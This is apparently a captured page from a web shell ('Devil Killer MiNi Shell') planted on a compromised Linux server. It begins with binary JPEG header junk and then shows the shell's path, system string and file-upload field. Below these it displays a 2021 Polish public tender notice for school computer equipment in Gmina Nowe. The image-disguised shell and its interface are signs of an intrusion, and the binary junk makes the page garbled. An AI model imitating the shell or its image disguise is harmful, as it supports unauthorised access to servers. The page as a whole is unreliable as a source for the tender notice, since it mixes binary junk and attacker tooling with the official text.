JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210621/0008935201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00089352 z dnia 2021-06-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa sprzętu komputerowego i multimedialnego dla szkół podstawowych w Gminie Nowe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMORZĄDOWA ADMINISTRACJA PLACÓWEK OŚWIATOWYCH W NOWEM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001112669</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Myśliwska 2 lokal B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowe</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-170</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523328568</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">523328568</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">saponowe@o2.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://saponowe.naszaplacowka.pl/bip/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Administracja samorządowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa sprzętu komputerowego i multimedialnego dla szkół podstawowych w Gminie Nowe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b3f7a0c5-d287-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00089352</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Kształtowanie kompetencji kluczowych uczniów szkół Gminy Nowe szansą na lepsze jutro </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 roku o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344).2) Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt z zastrzeżeniem możliwości wynikających z rozporządzenia oraz rozdziału XV SWZ. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 IDW składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.3) Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP https://obywatel.gov.pl/nforms/ezamowienia oraz udostępnionego przez miniPortal (Formularz do komunikacji) https://miniportal.uzp.gov.pl/. 4) We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia lub numerem postępowania.5) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal.6) Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do Formularza do złożenia, zmiany, wycofania oferty lub wniosku oraz do Formularza do komunikacji. 7) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu tych formularzy opisane zostały w Regulaminie korzystania z miniPortalu (https://miniportal.uzp.gov.pl/WarunkiUslugi) oraz<br/>Regulaminie ePUAP (https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin).8) Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany,<br/>wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.9) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).10) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” musi wynosi 150 MB.11) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz<br/>innych informacji przyjmuje się datę ich przekazania na ePUAP,12) Zamawiający może w uzasadnionych przypadkach również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: saponowe@o2.pl13) Dokumenty elektroniczne, składane są przez Wykonawcę<br/>za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w<br/>ust. 12 powyżej adres e-mail, przy jednoczesnym przesłaniu przez Wykonawcę dokumentów za pośrednictwem ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zam. udostępnia dane osob., o których mowa w art. 10<br/>roz. 2016/679, w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale<br/>IX, do upływu terminu na ich wniesienie.2. Skorzystanie przez osobę, której dane osob. dotyczą, z<br/>upraw. do sprostowania lub uzupełnienia, o którym mowa w art. 16 roz.2016/679, nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zam. pub. w zakresie niezgodnym z ustawą.3. Zgłoszenie żądania ograniczenia przetw., o którym<br/>mowa w art. 18 ust. 1 roz. 2016/679, nie ogranicza przetwarzania danych osob. do czasu zakończenia<br/>tego postępowania.4. W przyp. gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18<br/>ust. 1 roz. 2016/679, spowoduje ograniczenie przetw. danych osob. zawartych w protokole<br/>postępowania lub zał. do tego protokołu, od dnia zakończenia postęp.o udzielenie zam. zamawiający<br/>nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2<br/>roz.2016/679.5. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp, stosuje<br/>się odpowiednio.6. W przypadku korzystania przez osobę, której dane osob. są przetw. przez zam., z<br/>uprawnienia, o którym mowa w art. 15 ust. 1–3 roz. 2016/679, zam.może żądać od osoby występującej<br/>z żądaniem wskazania dodatkowych infor., mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zam..7. Skorzystanie przez osobę, której dane osob. są<br/>przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osob., o którym mowa w art. 16<br/>roz. 2016/679, nie może naruszać integralności protokołu postęp. oraz jego załączników.8. W postęp.<br/>są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja<br/>2018 r. o ochronie danych osob. (t. j. Dz. U. z 2019 r. poz. 1781) oraz roz.2016/679. Dane te mogą<br/>dotyczyć w szczególności samego wykonawcy (osoby fizycznej prowadzącej dział.gosp.), jego<br/>pełnomocnika (osoby fizycznej), jak też informacji o osobach, które w swojej ofercie wykonawca<br/>przedkłada celem wykazania spełniania warunków udziału w postęp., braku podstaw do wykluczenia z<br/>postęp., jak i potwierdzenia wymogów zam. dotyczących wykonania przedmiotu zam..9. W postęp. i po<br/>zakończeniu postęp. do przetw.danych osob. osób fizycznych stosuje się przepisy ustawy z dnia 10<br/>maja 2018 r. o ochronie danych osob. (Dz.U. z 2019 r. poz. 1781) oraz roz. 2016/679.10. Zgodnie z art.<br/>13 ust. 1 i 2 roz. 2016/679, zam. informuje, że: 1) adm. danych osob. osób fiz. jest Gmina Nowe.2) Zam. wyznaczył IOD, z którym można się skontaktować pocztą elektr.na adres<br/>agnieszka.stawicka@cbi24.pl3) dane osob. osób fiz. przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>roz. 2016/679 w celu związanym z postępowaniem o udzielenie zam. pub. - Zakup i dostawa sprzętu<br/>multimedialnego, komputerowego dla szkół podstawowych w Gm. Nowe.<br/>Oznaczenie spr.: 271.2.2021.UK) w odniesieniu do danych osob. osób fizy. decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 roz. 2016/679;5) osoba fizyczna<br/>posiada:a) na podstawie art. 15 roz. 2016/679 prawo dostępu do danych osobowych jej dotyczących;<br/>b) na podstawie art. 16 roz. 2016/679 prawo do sprostowania swoich danych osob.;c) na podstawie<br/>art. 18 roz. 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych osob. z<br/>zastrzeż. przypadków, o których mowa w art. 18 ust. 2 roz. 2016/679;d) prawo do wniesienia skargi do<br/>Prezesa UODO gdy osoba fiz. uzna, że przetwarzanie danych osob. jej dotyczących narusza przepisy<br/>roz. 2016/679; 6) osobie fizycznej nie przysługuje:a) w związku z art. 17 ust. 3 lit. b, d lub e roz.<br/>2016/679 prawo do usunięcia danych osob.; b) prawo do przenoszenia danych osob., o którym mowa<br/>w art. 20 roz. 2016/679;c) na podstawie art. 21 roz. 2016/679 prawo sprzeciwu, wobec przetw. danych<br/>osob., gdyż podstawą prawną przetw. danych osob. osób fiz. jest art. 6 ust. 1 lit. c roz. 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">11. Wykonawca ubiegając się o udzielenie zamówienia<br/>publicznego jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych związanych<br/>z udziałem w postępowaniu, w tym również obowiązków wynikających z rozporządzenia 2016/679, w<br/>szczególności obowiązek informacyjny przewidziany w art. 13 rozporządzenia 2016/679 względem<br/>osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio<br/>pozyskał. Obowiązek informacyjny wynikający z art. 13 rozporządzenia 2016/679 nie będzie miał<br/>zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi<br/>informacjami (art. 13 ust. 4 rozporządzenia 2016/679). 12. Wykonawca jest obowiązany wypełnić<br/>obowiązek informacyjny wynikający z art. 14 rozporządzenia 2016/679 względem osób fizycznych,<br/>których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma<br/>zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 rozporządzenia 2016/679.<br/>13. W celu zapewnienia, że wykonawca wypełnił obowiązki informacyjne wynikające z rozporządzenia<br/>2016/679 oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały<br/>przekazane w związku z ubieganiem się wykonawcy o udzielenie zamówienia w postępowaniu,<br/>wykonawca składa w postępowaniu oświadczenie o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 rozporządzenia 2016/679. Oświadczenie, o którym<br/>mowa w zdaniu pierwszym wykonawca składa w ofercie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.2.2021.UK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> "Zakup i dostawa sprzętu multimedialnego i komputerowego<br/>dla szkół podstawowych w gminie Nowe": 1) Szkoła Podstawowa w Trylu, 86-170 Nowe, Tryl 98,2) Szkoła Podstawowa nr 2 im. Arkadego Fiedlera w Nowem, 86-170Nowe, ul. Myśliwska 2b Zakres przedmiotu zamówienia obejmuje zakup i dostawę asortymentu wymienionego w załączniku nr 1 do niniejszego SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30230000-0 - Sprzęt związany z komputerami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <p class="mb-0">48761000-0 - Pakiety oprogramowania antywirusowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wynagrodzenie wykonawcy jest wynagrodzeniem ryczałtowym.<br/><br/>	2. Sposób obliczenia ceny określa opis zakresu rzeczowego przedmiotu zamówienia Załączniki nr 1 do SWZ. Zamawiający w poszczególnych pozycjach załączników nr 1 do SWZ wskazał stawkę podatku VAT jaką należy zastosować przy obliczaniu ceny oferty w formularzu ofertowym.<br/><br/><br/>XXIV. Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert.<br/><br/>	1. Kryterium „Cena” w zł:<br/><br/>1) znaczenie kryterium - 60% (0,6);<br/>2) opis sposobu oceny ofert dla kryterium „Ceny”:<br/>Lcena = (Cmin / C) x 0,6 x 100 pkt<br/>gdzie:<br/>a) Lcena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/>b) Cmin - cena w ofercie z najniższą ceną;<br/>c) C - cena w ofercie ocenianej.<br/><br/>	2. Kryterium „Termin płatności faktur” (TPF):<br/><br/>1) znaczenie kryterium - 40% (0,4);<br/>2) opis sposobu oceny ofert dla kryterium „TPF”:<br/>Ltpf = (TP / TPmax) x 0,4 x 100 pkt<br/>gdzie:<br/>a) Ltpf - liczba uzyskanych punktów dla kryterium „TPF” ocenianej oferty;<br/>b) TP - termin płatności w ofercie ocenianej<br/>c) TPmax - termin płatności w ofercie z najdłuższym terminem płatności<br/>Wykonawca podaje termin płatności w liczbach całkowitych oraz słownie w formularzu oferty stanowiącym Załącznik nr 2 do SWZ.<br/><br/>	3. Zamawiający wymaga, aby najkrótszy termin płatności wynosił 7 dni, a najdłuższy 30 dni. W przypadku, gdy Wykonawca nie poda terminu płatności lub zaoferuje termin krótszy niż 7 dni, oferta Wykonawcy będzie podlegała odrzuceniu, jako niezgodna z SWZ. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. W przypadku zaoferowania przez Wykonawcę terminu płatności przekraczającego 30 dni, na potrzeby oceny oferty Zamawiający przyjmie, że Wykonawca zaoferował 30-dniowy termin płatności. <br/><br/>	4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/><br/>	5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą (Zamawiający jako najkorzystniejszą uzna ofertę z największą liczbą punktów sumowanych zgodnie z kryterium oceny).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin Płatności Faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w SWZ, oraz spełniają określone przez Zamawiającego warunki udziału<br/>w postępowaniu. 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają<br/>warunki dotyczące:1) zdolności do występowania w obrocie gospodarczym:Zamawiający nie<br/>stawia warunku w powyższym zakresie.2) uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:Zamawiający nie stawia<br/>warunku w powyższym zakresie.3) sytuacji ekonomicznej lub finansowej:Zamawiający nie<br/>stawia warunku w powyższym zakresie.4) zdolności technicznej lub zawodowej:Zamawiający nie<br/>stawia warunku w powyższym zakresie. 3. Zamawiający, w stosunku do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności<br/>technicznej lub zawodowej –dopuszcza łączne spełnianie warunku przez Wykonawców. 4.<br/>Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w<br/>inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień<br/>składania ofertoświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do<br/>wykluczenia z postępowania – zgodnie z Załącznikiem nr 5 do SWZ. 2. Informacje zawarte w<br/>oświadczeniu, o którym mowa w ust 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 3. Zamawiający wzywa Wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni<br/>od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o<br/>zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych.</span> </h3> <h3 class="mb-0"> 